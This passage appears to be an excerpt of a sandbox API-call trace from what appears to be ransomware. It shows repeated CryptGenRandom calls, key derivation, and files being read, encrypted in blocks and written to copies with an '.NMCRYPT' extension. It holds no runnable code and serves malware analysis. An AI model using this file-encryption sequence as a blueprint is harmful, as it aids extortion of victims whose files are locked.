pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.095] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.096] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.097] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.098] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.098] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.099] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0157.099] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.099] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad7f8) returned 1 [0157.099] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0157.099] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0157.099] wcslen (_String="\\\\?\\") returned 0x4 [0157.099] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad778) returned 1 [0157.099] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0157.099] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0157.101] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=15097) returned 1 [0157.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0157.102] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.103] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.103] GetLastError () returned 0x0 [0157.103] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.151] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.151] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.151] GetLastError () returned 0x0 [0157.151] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.151] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.151] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.152] GetLastError () returned 0x0 [0157.152] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.152] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.152] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.152] GetLastError () returned 0x0 [0157.152] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.152] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.152] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.152] GetLastError () returned 0x0 [0157.152] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.152] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.152] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.152] GetLastError () returned 0x0 [0157.152] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.152] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.152] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.152] GetLastError () returned 0x0 [0157.152] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.152] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.152] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.152] GetLastError () returned 0x0 [0157.152] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.152] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.152] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.152] GetLastError () returned 0x0 [0157.152] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.153] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.153] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, 